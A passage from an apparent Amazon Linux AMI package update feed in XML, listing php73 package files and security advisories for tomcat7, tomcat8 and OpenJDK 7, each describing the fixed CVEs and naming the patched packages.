version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.15" release="1.24.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-snmp-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.15" release="1.24.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-ldap-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.15" release="1.24.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-snmp-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.15-1.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1352</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1352: important priority package update for tomcat7</title><issued date="2020-03-09 19:20:00" /><updated date="2021-08-20 19:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1938:
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed:
- returning arbitrary files from anywhere in the web application
- processing any file in the web application as a JSP
Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
1806398: CVE-2020-1938 tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability
CVE-2020-1935:
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
1806835: CVE-2020-1935 tomcat: Mishandling of Transfer-Encoding header allows for HTTP request smuggling
CVE-2019-17569:
The refactoring present in Apache Tomcat 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
1806849: CVE-2019-17569 tomcat: Regression in handling of Transfer-Encoding header allows for HTTP request smuggling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17569" title="" id="CVE-2019-17569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1935" title="" id="CVE-2020-1935" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938" title="" id="CVE-2020-1938" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-jsp-2.2-api" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.100" 
release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.100-1.36.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1353</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1353: important priority package update for tomcat8</title><issued date="2020-03-09 19:21:00" /><updated date="2021-08-20 19:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1938:
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed:
- returning arbitrary files from anywhere in the web application
- processing any file in the web application as a JSP
Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
1806398: CVE-2020-1938 tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability
CVE-2020-1935:
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
1806835: CVE-2020-1935 tomcat: Mishandling of Transfer-Encoding header allows for HTTP request smuggling
CVE-2019-17569:
The refactoring present in Apache Tomcat 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
1806849: CVE-2019-17569 tomcat: Regression in handling of Transfer-Encoding header allows for HTTP request smuggling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17569" title="" id="CVE-2019-17569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1935" title="" id="CVE-2020-1935" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938" title="" id="CVE-2020-1938" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-javadoc" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.51" release="1.83.amzn1" 
epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.51-1.83.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1354</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1354: important priority package update for java-1.7.0-openjdk</title><issued date="2020-03-16 21:23:00" /><updated date="2020-03-18 22:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2659:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u241 and 8u231; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1791284: CVE-2020-2659 OpenJDK: Incomplete enforcement of maxDatagramSockets limit in DatagramChannelImpl (Networking, 8231795)
CVE-2020-2654:
Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1791217: CVE-2020-2654 OpenJDK: Excessive memory usage in OID processing in X.509 certificate parsing (Libraries, 8234037)
CVE-2020-2604:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS v3.0 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
99999:
1790944: CVE-2020-2604 OpenJDK: Serialization filter changes via jdk.serialFilter property modification (Serialization, 8231422)
CVE-2020-2601:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Java SE, Java SE Embedded. While the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N).
99999:
1790570: CVE-2020-2601 OpenJDK: Use of unsafe RSA-MD5 checksum in Kerberos TGS (Security, 8229951)
CVE-2020-2593:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
99999:
1790884: CVE-2020-2593 OpenJDK: Incorrect isBuiltinStreamHandler check causing URL normalization issues (Networking, 8228548)
CVE-2020-2590:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
99999:
1790556: CVE-2020-2590 OpenJDK: Improper checks of SASL message properties in GssKrb5Base (Security, 8226352)
CVE-2020-2583:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1790444: CVE-2020-2583 OpenJDK: Incorrect exception processing during deserialization in BeanContextSupport (Serialization, 8224909)
CVE-2019-2999:
Vulnerability in the Java SE product of Oracle Java SE (component: Javadoc). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE accessible data as well as unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N).
99999:
1760992: CVE-2019-2999 OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765)
CVE-2019-2992:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1761146: CVE-2019-2992 OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597)
CVE-2019-2989:
Vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle GraalVM (component: Java). The supported version that is affected is 19.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM Enterprise Edition. While the vulnerability is in Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle GraalVM Enterprise Edition accessible data. CVSS 3.0 Base Score 6.8 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N).
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. While the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS v3.0 Base Score 6.8 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N).
99999:
1761601: CVE-2019-2989 OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298)
CVE-2019-2988:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1760999: CVE-2019-2988 OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292)
CVE-2019-2987:
Vulnerability in the Java SE product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 11.0.4 and 13. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1761149: CVE-2019-2987 OpenJDK: Missing glyph bitmap image dimension check in FreetypeFontScaler (2D, 8225286)
CVE-2019-2983:
